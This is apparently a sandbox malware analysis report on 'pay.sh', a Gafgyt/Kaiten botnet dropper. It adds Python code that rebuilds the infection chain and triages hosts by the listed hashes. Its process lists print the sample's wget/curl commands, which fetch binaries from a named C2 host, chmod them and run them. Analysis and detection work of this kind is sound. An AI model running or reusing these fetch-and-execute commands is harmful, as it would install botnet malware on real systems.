Malware Analysis Report

2024-11-13 17:22

Sample ID: 241022-tj267svgrq
Target: pay.sh
SHA256: 0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c
Tags: gafgyt kaiten botnet defense_evasion discovery persistence privilege_escalation antivm
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral3
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral4
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10
SHA256: 0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c
Threat Level: Known bad

The file pay.sh was found to be: Known bad.

pay.sh is a shell-script dropper. In the two MIPS detonations (behavioral3 on mipsbe, behavioral4 on mipsel) it pulls three binaries, m3cr0, zigaarch64 and x00x, from http://floodernetwork111.accesscam.org:8089/b/ (191.19.234.178 at detonation time), each with wget followed by curl into the same file name; marks each with chmod +x; runs it; then deletes both the file and any ".1" copy wget may have left behind. It then downloads bash.sh from the same host, runs it with bash (bash.sh fetches and runs m3cr0 a second time), and ends with sleep 6000. Along the way pay.sh opens /root/.bashrc for writing, which is what triggers the persistence, privilege_escalation and defense_evasion tags; the report records the open, not the content written. The Gafgyt/Bashlite and Kaiten/Tsunami rules fire on these runs, but the report does not record which dropped file matched them. In the amd64 and armhf runs (behavioral1, behavioral2) the chain stops after the first wget/curl for m3cr0: the DNS lookups happen, no TCP connection to the C2 host follows, and no chmod, execution or dropped file is recorded. The /proc reads tagged discovery and antivm are performed by /usr/bin/curl, not by the sample or a payload, and are best read as start-up behaviour of curl's own libraries.

Malicious Activity Summary

Tags: gafgyt kaiten botnet defense_evasion discovery persistence privilege_escalation antivm

Signatures (detailed per detonation below):
  Detected Gafgyt variant
  Detects Kaiten/Tsunami Payload
  Kaiten/Tsunami
  Detects Kaiten/Tsunami payload
  Gafgyt/Bashlite
  Executes dropped EXE
  File and Directory Permissions Modification
  Creates/modifies environment variables
  Modifies Bash startup script
  Checks CPU configuration
  Reads runtime system information
  Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-10-22 16:06

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted: 2024-10-22 16:06
Reported: 2024-10-22 16:08
Platform: debian9-mipsbe-20240611-en
Max time kernel: 64s
Max time network: 69s

Command Line

[/tmp/pay.sh]

Signatures

Detected Gafgyt variant
  1 match; no description, indicator, process or target recorded

Detects Kaiten/Tsunami Payload
  2 matches; no description, indicator, process or target recorded

Detects Kaiten/Tsunami payload
  2 matches; no description, indicator, process or target recorded

Gafgyt/Bashlite
  Tags: botnet gafgyt

Kaiten/Tsunami
  Tags: botnet kaiten

File and Directory Permissions Modification
  Tags: defense_evasion
  Process: /bin/chmod (4 matches, one per chmod +x in the process list; no indicator recorded)

Executes dropped EXE
  Indicator        Process
  /tmp/m3cr0       /tmp/m3cr0
  /tmp/zigaarch64  /tmp/zigaarch64
  /tmp/x00x        /tmp/x00x
  /tmp/m3cr0       /tmp/m3cr0

Creates/modifies environment variables
  Tags: persistence privilege_escalation defense_evasion
  File opened for modification: /root/.bashrc, by /tmp/pay.sh

Modifies Bash startup script
  Tags: persistence
  File opened for modification: /root/.bashrc, by /tmp/pay.sh
  The report records only the open-for-write; the bytes written to .bashrc are not shown, so the persistence mechanism is inferred from the target file, not from its new contents.

Reads runtime system information
  Tags: discovery
  File opened for reading: /proc/sys/crypto/fips_enabled, by /usr/bin/curl (5 matches, one per curl invocation)
  The reader is /usr/bin/curl, not pay.sh or a dropped binary. Crypto libraries linked into curl (GnuTLS and libgcrypt, for instance) probe this file for FIPS mode at initialisation, so this is a side effect of running curl rather than discovery by the sample.

Writes file to tmp directory
  File opened for modification  Process
  /tmp/zigaarch64               /usr/bin/wget
  /tmp/zigaarch64               /usr/bin/curl
  /tmp/x00x                     /usr/bin/curl
  /tmp/bash.sh                  /usr/bin/wget
  /tmp/bash.sh                  /usr/bin/curl
  /tmp/m3cr0                    /usr/bin/wget
  /tmp/m3cr0                    /usr/bin/curl
  /tmp/x00x                     /usr/bin/wget
  /tmp/m3cr0                    /usr/bin/curl
  /tmp/m3cr0                    /usr/bin/wget

Processes

/tmp/pay.sh [/tmp/pay.sh]
/usr/bin/wget [wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl [curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]
/bin/chmod [chmod +x m3cr0]
/tmp/m3cr0 [./m3cr0]
/bin/rm [rm -rf m3cr0]
/bin/rm [rm -rf m3cr0.1]
/usr/bin/wget [wget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch64]
/usr/bin/curl [curl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch64]
/bin/chmod [chmod +x zigaarch64]
/tmp/zigaarch64 [./zigaarch64]
/bin/rm [rm -rf zigaarch64]
/bin/rm [rm -rf zigaarch64.1]
/usr/bin/wget [wget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x]
/usr/bin/curl [curl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x]
/bin/chmod [chmod +x x00x]
/tmp/x00x [./x00x]
/bin/rm [rm -rf x00x]
/bin/rm [rm -rf x00x.1]
/usr/bin/wget [wget http://floodernetwork111.accesscam.org:8089/bash.sh]
/usr/bin/curl [curl -O http://floodernetwork111.accesscam.org:8089/bash.sh]
/bin/rm [rm -rf bash.sh.1]
/bin/bash [bash bash.sh]
/usr/bin/wget [wget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl [curl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]
/bin/chmod [chmod +x m3cr0]
/tmp/m3cr0 [./m3cr0]
/bin/rm [rm -rf m3cr0]
/bin/rm [rm -rf m3cr0.1]
/bin/sleep [sleep 6000]
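
To make the chain above checkable rather than eyeballed, here is an added Python example (not part of the sandbox report or of the sample) that replays these command lines and rebuilds the per-file lifecycle. The input is copied from this Processes section; Stage, fetch_target, reconstruct and summarize are names chosen for the example. It flags each file that goes through fetch, chmod +x, execute and delete, separates interpreted stages such as bash.sh (run via bash, never chmod'ed), and extracts the download URLs and the C2 host:port for blocking.

```python
"""Rebuild a shell dropper's stage chain from a sandbox process list.

Added example, not part of the sandbox report. The input is copied from the
behavioral3 Processes section; Stage, fetch_target, reconstruct and summarize
are names chosen here. Flag handling follows the tools' documented behaviour:
wget -O FILE and curl -o FILE name the output, curl -O keeps the remote name.
"""
import re
import shlex
from dataclasses import dataclass, field
from urllib.parse import urlparse

C2 = "http://floodernetwork111.accesscam.org:8089"
# Constructed input: the report's command lines in order, one dropper stage per line.
PROCESS_LOG = [cmd.strip() for line in f"""
/tmp/pay.sh
wget {C2}/b/m3cr0 -O m3cr0; curl {C2}/b/m3cr0 -o m3cr0; chmod +x m3cr0; ./m3cr0; rm -rf m3cr0; rm -rf m3cr0.1
wget {C2}/b/zigaarch64 -O zigaarch64; curl {C2}/b/zigaarch64 -o zigaarch64; chmod +x zigaarch64; ./zigaarch64; rm -rf zigaarch64; rm -rf zigaarch64.1
wget -q {C2}/b/x00x -O x00x; curl -s {C2}/b/x00x -o x00x; chmod +x x00x; ./x00x; rm -rf x00x; rm -rf x00x.1
wget {C2}/bash.sh; curl -O {C2}/bash.sh; rm -rf bash.sh.1; bash bash.sh
wget -q {C2}/b/m3cr0 -O m3cr0; curl -s {C2}/b/m3cr0 -o m3cr0; chmod +x m3cr0; ./m3cr0; rm -rf m3cr0; rm -rf m3cr0.1
sleep 6000
""".strip().splitlines() for cmd in line.split(";")]

URL_RE = re.compile(r"^https?://\S+$")


@dataclass
class Stage:
    """Lifecycle of one dropped artifact, keyed by its local file name."""
    name: str
    urls: list = field(default_factory=list)
    fetched: bool = False
    made_executable: bool = False
    executed: bool = False
    removed: bool = False

    def is_drop_exec_wipe(self) -> bool:
        """The IoT-dropper signature: pull, chmod +x, run, delete."""
        return self.fetched and self.made_executable and self.executed and self.removed


def fetch_target(argv):
    """Return (url, local file name) for a wget/curl argv; name is None if output goes to stdout."""
    url = next((a for a in argv[1:] if URL_RE.match(a)), None)
    if url is None:
        return None, None
    remote_name = urlparse(url).path.rsplit("/", 1)[-1]
    if argv[0] == "wget":
        return url, (argv[argv.index("-O") + 1] if "-O" in argv else remote_name)
    if "-o" in argv:  # curl -o FILE
        return url, argv[argv.index("-o") + 1]
    return url, (remote_name if "-O" in argv else None)


def reconstruct(cmdlines):
    """Replay command lines; return ({name: Stage}, sleep seconds or None)."""
    stages, sleep_seconds = {}, None
    stage = lambda name: stages.setdefault(name, Stage(name))
    for line in cmdlines:
        argv = shlex.split(line)
        if not argv:
            continue
        tool = argv[0]
        if tool in ("wget", "curl"):
            url, name = fetch_target(argv)
            if name:
                stage(name).fetched = True
                if url not in stage(name).urls:
                    stage(name).urls.append(url)
        elif tool == "chmod" and "+x" in argv:
            for name in argv[argv.index("+x") + 1:]:
                stage(name).made_executable = True
        elif tool == "rm":
            for arg in (a for a in argv[1:] if not a.startswith("-")):
                # "rm -rf X.1" also wipes the copy wget leaves when X already exists.
                stage(arg[:-2] if arg.endswith(".1") else arg).removed = True
        elif tool.startswith("./"):
            stage(tool[2:]).executed = True
        elif tool in ("bash", "sh") and len(argv) > 1:
            stage(argv[1]).executed = True  # interpreted stage: no chmod needed
        elif tool == "sleep" and len(argv) > 1:
            sleep_seconds = int(argv[1])
    return stages, sleep_seconds


def summarize(cmdlines):
    """Indicators and behaviour flags a responder wants from the chain."""
    stages, sleep_seconds = reconstruct(cmdlines)
    urls = sorted({u for st in stages.values() for u in st.urls})
    return {
        "dropped_files": sorted(stages),
        "urls": urls,
        "c2_hosts": sorted({urlparse(u).netloc for u in urls}),
        "drop_exec_wipe": sorted(n for n, st in stages.items() if st.is_drop_exec_wipe()),
        "script_stages": sorted(n for n, st in stages.items() if st.executed and not st.made_executable),
        "sleep_seconds": sleep_seconds,
    }


if __name__ == "__main__":
    for key, value in summarize(PROCESS_LOG).items():
        print(f"{key}: {value}")
```

Running it lists the four dropped names, the four unique URLs on floodernetwork111.accesscam.org:8089, the three binaries that complete the drop-exec-wipe cycle, bash.sh as the interpreted stage, and the 6000-second sleep. The same summarize() runs unchanged on the truncated amd64 and armhf process lists, where drop_exec_wipe comes back empty because the chain never gets past the first fetch.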

Network

Country  Destination          Domain                           Proto  Count
US       1.1.1.1:53           floodernetwork111.accesscam.org  udp    10
BR       191.19.234.178:8089  floodernetwork111.accesscam.org  tcp    10

Ten identical DNS-lookup/TCP-connection pairs, one per wget or curl invocation in the process list, collapsed into one row each. 191.19.234.178 is the address floodernetwork111.accesscam.org resolved to at detonation time; dynamic-DNS names like this one can repoint, so block on the domain as well as the IP.

Files

/tmp/m3cr0

MD5 75c00b238bd8105414cbb5d08601ca1a
SHA1 2a5e59555f348bfd9fa9fc4e3e04338ee4e74576
SHA256 edbe8e5b476327cac01434634849de230eaeae5943e3cc6680aa8c6ccc29d361
SHA512 a7198035e4dc090cc10d20c19d4f606d5e5d4bba4ea9ab54ed61dbdbe93da16c3a5a85eb4a0c9d39af8dbfc4c578f5a01c5aaa271b5c649e646341ad6ce300b5

/tmp/zigaarch64

MD5 48ea3c3566c796e4f74e8e3d6df15cd3
SHA1 b1ef1574ced09471c26a4c749d5a4ab5ba7942cd
SHA256 79b552ce829cd07000f0ff57dcc7970c43a8a0e2b75c4b0158acd4e24cb1f47a
SHA512 cb5d342e421089ccba5be87ba64833ee90b78c2954b27719033fa56afbd4aae232b153ba45a7b4664886be8a5961890e54e92349af7e6ef517e7f0a3933928cd

/tmp/x00x

MD5 f042a9131a6d06671e98c1ed1f8d80a8
SHA1 dd97fac87e8d4a973dc4867524908f3384916f27
SHA256 a70fdd8fa252beeca41955bee2d4ce3e6e1f6aa60746ee96ec59b96106080a6c
SHA512 629282e501a77e08295260802427747288af6bca1c0695adb9325b9ce01b9e4b0f4a065c86829eeba5c91cfb66d2965d3de3968e87a3d277471a2216ea2eaafe

/tmp/bash.sh

MD5 8bbe815474c7d3ed318e958c05e1c95b
SHA1 36235a707a29d27b01570ef8c973c522f563c15c
SHA256 469640f9d4de9b71c4720298f7eb585c403f5a13e55e2bedc0da3937dd8b8f5b
SHA512 137a228141556d1fc6da421fd8bc45b81108908c39e734b235af6dca9b36dee059043f046dd2f670067a10db1e0280a0941f45c0b7ee1c774d1aa7f4cc2e756f
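
The hashes above are the indicators a responder can act on. The following Python is an added example, not part of the sandbox report or of the sample: it checks a host (or a mounted image) for dropped payloads in /tmp by the SHA-256 values listed here, or by a dropped file's name including wget's ".1" copy, and lists /root/.bashrc lines that mention the C2 host, a dropped name or a /tmp path. The .bashrc pattern is an assumption: the report shows only that pay.sh opened the file for writing, not what it wrote. scan_tmp, scan_rc and triage are names chosen for the example.

```python
"""Host triage for the indicators in this report.

Added example, not part of the sandbox report or the sample. It checks what the
report supports: payloads in /tmp matching the listed SHA-256 values (or carrying a
dropped file's name), and lines in /root/.bashrc that mention the C2 host, a dropped
name, or a /tmp path. The report records only that pay.sh opened /root/.bashrc for
writing, not what it wrote, so the .bashrc pattern is an assumption about likely content.
"""
import hashlib
import os
import re

# SHA-256 values from the report's Files sections (identical in the mipsbe and mipsel runs).
KNOWN_SHA256 = {
    "edbe8e5b476327cac01434634849de230eaeae5943e3cc6680aa8c6ccc29d361": "m3cr0",
    "79b552ce829cd07000f0ff57dcc7970c43a8a0e2b75c4b0158acd4e24cb1f47a": "zigaarch64",
    "a70fdd8fa252beeca41955bee2d4ce3e6e1f6aa60746ee96ec59b96106080a6c": "x00x",
    "469640f9d4de9b71c4720298f7eb585c403f5a13e55e2bedc0da3937dd8b8f5b": "bash.sh",
}
C2_HOST = "floodernetwork111.accesscam.org"
DROPPED_NAMES = ("m3cr0", "zigaarch64", "x00x", "bash.sh", "pay.sh")
# Startup-file lines worth a look: the C2 host, a dropped name, or anything under /tmp.
SUSPICIOUS_RC = re.compile(
    "|".join([re.escape(C2_HOST), r"/tmp/\S+"] + [re.escape(n) for n in DROPPED_NAMES])
)


def sha256_file(path, chunk=1 << 16):
    """Stream a file through SHA-256 so large payloads do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_tmp(tmp_dir, known=KNOWN_SHA256):
    """Return [(path, label)]: 'sha256:<name>' for a hash match, 'name:<name>' for a file
    that merely carries a dropped name (including wget's '.1' duplicate-name copies)."""
    hits = []
    if not os.path.isdir(tmp_dir):
        return hits
    for entry in os.scandir(tmp_dir):
        if not entry.is_file(follow_symlinks=False):
            continue
        digest = sha256_file(entry.path)
        base = entry.name[:-2] if entry.name.endswith(".1") else entry.name
        if digest in known:
            hits.append((entry.path, "sha256:" + known[digest]))
        elif base in DROPPED_NAMES:
            hits.append((entry.path, "name:" + base))
    return hits


def scan_rc(path):
    """Return [(line number, line)] for startup-file lines matching SUSPICIOUS_RC."""
    if not os.path.isfile(path):
        return []
    with open(path, errors="replace") as f:
        return [(n, line.rstrip("\n")) for n, line in enumerate(f, 1) if SUSPICIOUS_RC.search(line)]


def triage(root="/"):
    """Run both checks under root: '/' on a live host, or the mount point of an image."""
    return {
        "tmp_hits": scan_tmp(os.path.join(root, "tmp")),
        "bashrc_hits": scan_rc(os.path.join(root, "root", ".bashrc")),
    }


if __name__ == "__main__":
    import json
    import sys
    print(json.dumps(triage(sys.argv[1] if len(sys.argv) > 1 else "/"), indent=2))
```

Run with a mount point as the only argument to triage an offline image, or with no argument on the live host. A hash match is conclusive for these exact payload bytes; a name-only hit or a flagged .bashrc line is a lead to inspect rather than a verdict, since both the file names and whatever the script writes to .bashrc can change between campaigns.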

Analysis: behavioral4

Detonation Overview

Submitted: 2024-10-22 16:06
Reported: 2024-10-22 16:08
Platform: debian9-mipsel-20240729-en
Max time kernel: 41s
Max time network: 43s

Command Line

[/tmp/pay.sh]

Signatures

Detected Gafgyt variant
  1 match; no description, indicator, process or target recorded

Detects Kaiten/Tsunami Payload
  2 matches; no description, indicator, process or target recorded

Detects Kaiten/Tsunami payload
  2 matches; no description, indicator, process or target recorded

Gafgyt/Bashlite
  Tags: botnet gafgyt

Kaiten/Tsunami
  Tags: botnet kaiten

File and Directory Permissions Modification
  Tags: defense_evasion
  Process: /bin/chmod (4 matches, one per chmod +x in the process list; no indicator recorded)

Executes dropped EXE
  Indicator        Process
  /tmp/m3cr0       /tmp/m3cr0
  /tmp/zigaarch64  /tmp/zigaarch64
  /tmp/x00x        /tmp/x00x
  /tmp/m3cr0       /tmp/m3cr0

Creates/modifies environment variables
  Tags: persistence privilege_escalation defense_evasion
  File opened for modification: /root/.bashrc, by /tmp/pay.sh

Modifies Bash startup script
  Tags: persistence
  File opened for modification: /root/.bashrc, by /tmp/pay.sh
  Only the open-for-write is recorded; the content written is not shown.

Reads runtime system information
  Tags: discovery
  File opened for reading: /proc/sys/crypto/fips_enabled, by /usr/bin/curl (5 matches, one per curl invocation)
  Performed by curl's crypto libraries at initialisation (a FIPS-mode probe), not by the sample or a dropped binary.

Writes file to tmp directory
  File opened for modification  Process
  /tmp/zigaarch64               /usr/bin/wget
  /tmp/zigaarch64               /usr/bin/curl
  /tmp/x00x                     /usr/bin/curl
  /tmp/bash.sh                  /usr/bin/curl
  /tmp/m3cr0                    /usr/bin/wget
  /tmp/m3cr0                    /usr/bin/curl
  /tmp/m3cr0                    /usr/bin/wget
  /tmp/m3cr0                    /usr/bin/curl
  /tmp/x00x                     /usr/bin/wget
  /tmp/bash.sh                  /usr/bin/wget

Processes

/tmp/pay.sh [/tmp/pay.sh]
/usr/bin/wget [wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl [curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]
/bin/chmod [chmod +x m3cr0]
/tmp/m3cr0 [./m3cr0]
/bin/rm [rm -rf m3cr0]
/bin/rm [rm -rf m3cr0.1]
/usr/bin/wget [wget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch64]
/usr/bin/curl [curl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch64]
/bin/chmod [chmod +x zigaarch64]
/tmp/zigaarch64 [./zigaarch64]
/bin/rm [rm -rf zigaarch64]
/bin/rm [rm -rf zigaarch64.1]
/usr/bin/wget [wget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x]
/usr/bin/curl [curl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x]
/bin/chmod [chmod +x x00x]
/tmp/x00x [./x00x]
/bin/rm [rm -rf x00x]
/bin/rm [rm -rf x00x.1]
/usr/bin/wget [wget http://floodernetwork111.accesscam.org:8089/bash.sh]
/usr/bin/curl [curl -O http://floodernetwork111.accesscam.org:8089/bash.sh]
/bin/rm [rm -rf bash.sh.1]
/bin/bash [bash bash.sh]
/usr/bin/wget [wget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl [curl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]
/bin/chmod [chmod +x m3cr0]
/tmp/m3cr0 [./m3cr0]
/bin/rm [rm -rf m3cr0]
/bin/rm [rm -rf m3cr0.1]
/bin/sleep [sleep 6000]

Network

Country  Destination          Domain                           Proto  Count
US       1.1.1.1:53           floodernetwork111.accesscam.org  udp    10
BR       191.19.234.178:8089  floodernetwork111.accesscam.org  tcp    10

Ten identical DNS-lookup/TCP-connection pairs, one per wget or curl invocation in the process list, collapsed into one row each.

Files

/tmp/m3cr0

MD5 75c00b238bd8105414cbb5d08601ca1a
SHA1 2a5e59555f348bfd9fa9fc4e3e04338ee4e74576
SHA256 edbe8e5b476327cac01434634849de230eaeae5943e3cc6680aa8c6ccc29d361
SHA512 a7198035e4dc090cc10d20c19d4f606d5e5d4bba4ea9ab54ed61dbdbe93da16c3a5a85eb4a0c9d39af8dbfc4c578f5a01c5aaa271b5c649e646341ad6ce300b5

/tmp/zigaarch64

MD5 48ea3c3566c796e4f74e8e3d6df15cd3
SHA1 b1ef1574ced09471c26a4c749d5a4ab5ba7942cd
SHA256 79b552ce829cd07000f0ff57dcc7970c43a8a0e2b75c4b0158acd4e24cb1f47a
SHA512 cb5d342e421089ccba5be87ba64833ee90b78c2954b27719033fa56afbd4aae232b153ba45a7b4664886be8a5961890e54e92349af7e6ef517e7f0a3933928cd

/tmp/x00x

MD5 f042a9131a6d06671e98c1ed1f8d80a8
SHA1 dd97fac87e8d4a973dc4867524908f3384916f27
SHA256 a70fdd8fa252beeca41955bee2d4ce3e6e1f6aa60746ee96ec59b96106080a6c
SHA512 629282e501a77e08295260802427747288af6bca1c0695adb9325b9ce01b9e4b0f4a065c86829eeba5c91cfb66d2965d3de3968e87a3d277471a2216ea2eaafe

/tmp/bash.sh

MD5 8bbe815474c7d3ed318e958c05e1c95b
SHA1 36235a707a29d27b01570ef8c973c522f563c15c
SHA256 469640f9d4de9b71c4720298f7eb585c403f5a13e55e2bedc0da3937dd8b8f5b
SHA512 137a228141556d1fc6da421fd8bc45b81108908c39e734b235af6dca9b36dee059043f046dd2f670067a10db1e0280a0941f45c0b7ee1c774d1aa7f4cc2e756f

All four hashes are identical to those recorded in the mipsbe run (behavioral3): the download URLs carry no platform-specific component, and the server returned the same bytes to both MIPS guests.

Analysis: behavioral1

Detonation Overview

Submitted: 2024-10-22 16:06
Reported: 2024-10-22 16:08
Platform: ubuntu1804-amd64-20240729-en
Max time kernel: 148s
Max time network: 128s

Command Line

[/tmp/pay.sh]

Signatures

Writes file to tmp directory
  File opened for modification: /tmp/m3cr0, by /usr/bin/wget

Processes

/tmp/pay.sh [/tmp/pay.sh]
/usr/bin/wget [wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl [curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]

The chain stops here: no chmod, execution or further download is recorded and the Files list is empty, so the first stage never arrived in this run.

Network

Country  Destination          Domain                           Proto
N/A      224.0.0.251:5353     (none)                           udp
US       1.1.1.1:53           floodernetwork111.accesscam.org  udp
US       1.1.1.1:53           floodernetwork111.accesscam.org  udp
US       151.101.129.91:443   (none)                           tcp
GB       185.125.188.62:443   (none)                           tcp
GB       185.125.188.62:443   (none)                           tcp
US       151.101.129.91:443   (none)                           tcp
GB       84.17.50.8:443       (none)                           tcp
US       1.1.1.1:53           1527653184.rsc.cdn77.org         udp
US       1.1.1.1:53           1527653184.rsc.cdn77.org         udp
GB       84.17.50.9:443       1527653184.rsc.cdn77.org         tcp

Only the two DNS queries for floodernetwork111.accesscam.org are attributable to the sample, and no TCP connection to the C2 host follows them, which matches the process list stalling after wget/curl. The mDNS traffic and the TLS connections (no domain recorded except the cdn77.org CDN name) come from no process in the sample's tree and are consistent with the Ubuntu guest's own background traffic; do not carry them over as indicators for this sample.

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2024-10-22 16:06
Reported: 2024-10-22 16:09
Platform: debian9-armhf-20240611-en
Max time kernel: 148s
Max time network: 27s

Command Line

[/tmp/pay.sh]

Signatures

Checks CPU configuration
  Tags: antivm
  File opened for reading: /proc/cpuinfo, by /usr/bin/curl

Reads runtime system information
  Tags: discovery
  File opened for reading: /proc/sys/crypto/fips_enabled, by /usr/bin/curl
  File opened for reading: /proc/self/auxv, by /usr/bin/curl

  All three reads come from /usr/bin/curl, not from pay.sh or a dropped binary. Reading /proc/cpuinfo and /proc/self/auxv is how crypto libraries detect ARM CPU features at start-up (libgcrypt does exactly this), and /proc/sys/crypto/fips_enabled is the FIPS-mode probe; treat the antivm and discovery tags in this run as side effects of invoking curl rather than as sample behaviour.

Writes file to tmp directory
  File opened for modification: /tmp/m3cr0, by /usr/bin/wget

Processes

/tmp/pay.sh [/tmp/pay.sh]
/usr/bin/wget [wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl [curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]

As in the amd64 run, the chain stops after the first fetch: no chmod, execution or further download is recorded and the Files list is empty.

Network

Country  Destination  Domain                           Proto
US       1.1.1.1:53   floodernetwork111.accesscam.org  udp
US       1.1.1.1:53   floodernetwork111.accesscam.org  udp

Two DNS queries and no TCP connection to the C2 host: the download never started, which is why no chmod, execution or dropped file follows in this run.

Files

N/A